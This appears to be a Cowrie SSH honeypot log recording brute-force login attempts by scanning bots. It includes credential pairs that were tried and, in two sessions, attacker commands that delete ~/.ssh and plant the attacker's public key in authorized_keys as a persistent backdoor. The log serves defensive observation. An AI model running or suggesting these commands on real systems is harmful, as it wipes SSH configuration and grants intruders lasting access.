{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55296,"dst_ip":"1.2.3.4","dst_port":22,"session":"68b2a51b663b","protocol":"ssh","message":"New connection: 217.72.205.35:55296 (1.2.3.4:22) [session: 68b2a51b663b]","sensor":"my-vps","timestamp":"2025-09-09T04:00:19.543078Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:19.544133Z","src_ip":"217.72.205.35","session":"68b2a51b663b"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":50121,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b7e58c765b8","protocol":"ssh","message":"New connection: 211.22.25.164:50121 (1.2.3.4:22) [session: 0b7e58c765b8]","sensor":"my-vps","timestamp":"2025-09-09T04:00:29.574824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:29.576093Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:29.816417Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.login.success","username":"root","password":"Q!w2e3r4","message":"login attempt [root/Q!w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:00:30.819269Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:00:31.350831Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:00:31.351511Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:00:31.352514Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:31.595170Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:00:32.090914Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:00:32.091604Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:00:32.334060Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:32.334978Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":35044,"dst_ip":"1.2.3.4","dst_port":22,"session":"769c3bd7280e","protocol":"ssh","message":"New connection: 211.22.25.164:35044 (1.2.3.4:22) [session: 769c3bd7280e]","sensor":"my-vps","timestamp":"2025-09-09T04:00:32.573056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:32.573838Z","src_ip":"211.22.25.164","session":"769c3bd7280e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:32.813556Z","src_ip":"211.22.25.164","session":"769c3bd7280e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:00:33.813482Z","src_ip":"211.22.25.164","session":"769c3bd7280e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:35.058208Z","src_ip":"211.22.25.164","session":"769c3bd7280e"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":35054,"dst_ip":"1.2.3.4","dst_port":22,"session":"742954ef64c2","protocol":"ssh","message":"New connection: 211.22.25.164:35054 (1.2.3.4:22) [session: 742954ef64c2]","sensor":"my-vps","timestamp":"2025-09-09T04:00:35.297102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:35.297728Z","src_ip":"211.22.25.164","session":"742954ef64c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:35.537656Z","src_ip":"211.22.25.164","session":"742954ef64c2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:00:36.541100Z","src_ip":"211.22.25.164","session":"742954ef64c2"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:36.781538Z","src_ip":"211.22.25.164","session":"0b7e58c765b8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:36.782636Z","src_ip":"211.22.25.164","session":"742954ef64c2"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":54046,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ffa49bd1af1","protocol":"ssh","message":"New connection: 152.32.190.168:54046 (1.2.3.4:22) [session: 2ffa49bd1af1]","sensor":"my-vps","timestamp":"2025-09-09T04:00:53.864017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:53.864939Z","src_ip":"152.32.190.168","session":"2ffa49bd1af1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:54.125831Z","src_ip":"152.32.190.168","session":"2ffa49bd1af1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu2023","message":"login attempt [ubuntu/ubuntu2023] failed","sensor":"my-vps","timestamp":"2025-09-09T04:00:55.209858Z","src_ip":"152.32.190.168","session":"2ffa49bd1af1"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":37864,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfdf611146a6","protocol":"ssh","message":"New connection: 192.210.135.20:37864 (1.2.3.4:22) [session: cfdf611146a6]","sensor":"my-vps","timestamp":"2025-09-09T04:00:55.318281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:00:55.318988Z","src_ip":"192.210.135.20","session":"cfdf611146a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:00:55.428570Z","src_ip":"192.210.135.20","session":"cfdf611146a6"}
{"eventid":"cowrie.login.failed","username":"roo","password":"111","message":"login attempt [roo/111] failed","sensor":"my-vps","timestamp":"2025-09-09T04:00:55.906569Z","src_ip":"192.210.135.20","session":"cfdf611146a6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:56.473084Z","src_ip":"152.32.190.168","session":"2ffa49bd1af1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:00:57.017865Z","src_ip":"192.210.135.20","session":"cfdf611146a6"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":46470,"dst_ip":"1.2.3.4","dst_port":22,"session":"c35f84b53c67","protocol":"ssh","message":"New connection: 154.209.4.55:46470 (1.2.3.4:22) [session: c35f84b53c67]","sensor":"my-vps","timestamp":"2025-09-09T04:01:17.043533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:01:17.049999Z","src_ip":"154.209.4.55","session":"c35f84b53c67"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:01:17.251097Z","src_ip":"154.209.4.55","session":"c35f84b53c67"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123","message":"login attempt [mysql/123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:01:18.061538Z","src_ip":"154.209.4.55","session":"c35f84b53c67"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:19.273575Z","src_ip":"154.209.4.55","session":"c35f84b53c67"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":39568,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ff99dd99973","protocol":"ssh","message":"New connection: 51.81.118.153:39568 (1.2.3.4:22) [session: 9ff99dd99973]","sensor":"my-vps","timestamp":"2025-09-09T04:01:25.914331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:01:25.915083Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:01:26.014912Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty12","message":"login attempt [root/Qwerty12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:01:26.456482Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:01:26.674938Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:01:26.675776Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:01:26.676626Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:26.777707Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:01:27.074308Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:01:27.075101Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:01:27.176083Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:01:27.177066Z","src_ip":"51.81.118.153","session":"9ff99dd99973"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":39580,"dst_ip":"1.2.3.4","dst_port":22,"session":"dac336826ccc","protocol":"ssh","message":"New connection: 51.81.118.153:39580 (1.2.3.4:22) [session: dac336826ccc]","sensor":"my-vps","timestamp":"2025-09-09T04:01:27.272145Z"}
